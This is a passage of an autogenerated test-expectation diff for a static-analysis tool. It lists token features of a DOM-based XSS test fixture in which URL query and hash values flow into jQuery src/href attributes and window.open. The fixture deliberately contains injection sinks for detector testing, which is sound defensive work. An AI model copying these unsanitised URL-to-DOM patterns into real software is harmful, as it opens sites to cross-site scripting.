autogenerated/Xss/DomBasedXss/tst.js:483:7:483:32 | url.sta ... ps://") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:32 | url.sta ... ps://") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:32 | url.sta ... ps://") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:483:11:483:20 | startsWith | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:483:11:483:20 | startsWith | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:483:11:483:20 | startsWith | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:483:11:483:20 | startsWith | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:483:11:483:20 | startsWith | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:483:22:483:31 | "https://" | CalleeFlexibleAccessPath | url.startsWith | | autogenerated/Xss/DomBasedXss/tst.js:483:22:483:31 | "https://" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:483:22:483:31 | "https://" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17994,6 +124175,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:483:22:483:31 | "https://" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:483:22:483:31 | "https://" | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:483:22:483:31 | "https://" | receiverName | url | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:5 | $ | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:5 | $ | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:26 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:26 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:26 | exceptional return of $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:35 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:43 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:484:5:484:43 | exceptional return of $("" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:484:7:484:13 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:484:7:484:13 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -18008,6 +124219,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:484:16:484:25 | {src: url} | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:484:16:484:25 | {src: url} | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:484:16:484:25 | {src: url} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:19 | src | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:19 | src | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:19 | src | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:19 | src | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:19 | src | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:24 | src: url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:24 | src: url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:24 | src: url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:24 | src: url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:24 | src: url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:24 | src: url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:24 | src: url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:24 | src: url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:24 | src: url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:484:17:484:24 | src: url | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:484:22:484:24 | url | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:484:22:484:24 | url | InputAccessPathFromCallee | 1.src | | autogenerated/Xss/DomBasedXss/tst.js:484:22:484:24 | url | InputArgumentIndex | 1 | @@ -18017,6 +124243,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:484:22:484:24 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:484:22:484:24 | url | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:484:22:484:24 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:484:28:484:35 | appendTo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:484:28:484:35 | appendTo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:484:28:484:35 | appendTo | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:484:28:484:35 | appendTo | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:484:28:484:35 | appendTo | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:484:37:484:42 | "body" | CalleeFlexibleAccessPath | $().appendTo | | autogenerated/Xss/DomBasedXss/tst.js:484:37:484:42 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:484:37:484:42 | "body" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -18024,6 +124255,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:484:37:484:42 | "body" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:484:37:484:42 | "body" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:484:37:484:42 | "body" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:5 | $ | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:5 | $ | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:26 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:26 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:26 | exceptional return of $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:35 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:43 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:486:5:486:43 | exceptional return of $("" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:486:7:486:13 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:486:7:486:13 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -18038,6 +124299,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:486:16:486:25 | {src: url} | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:486:16:486:25 | {src: url} | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:486:16:486:25 | {src: url} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:19 | src | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:19 | src | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:19 | src | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:19 | src | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:19 | src | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:24 | src: url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:24 | src: url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:24 | src: url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:24 | src: url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:24 | src: url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:24 | src: url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:24 | src: url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:24 | src: url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:24 | src: url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:486:17:486:24 | src: url | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:486:22:486:24 | url | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:486:22:486:24 | url | InputAccessPathFromCallee | 1.src | | autogenerated/Xss/DomBasedXss/tst.js:486:22:486:24 | url | InputArgumentIndex | 1 | @@ -18047,6 +124323,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:486:22:486:24 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:486:22:486:24 | url | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:486:22:486:24 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:486:28:486:35 | appendTo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:486:28:486:35 | appendTo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:486:28:486:35 | appendTo | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:486:28:486:35 | appendTo | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:486:28:486:35 | appendTo | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:486:37:486:42 | "body" | CalleeFlexibleAccessPath | $().appendTo | | autogenerated/Xss/DomBasedXss/tst.js:486:37:486:42 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:486:37:486:42 | "body" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -18054,6 +124335,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:486:37:486:42 | "body" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash 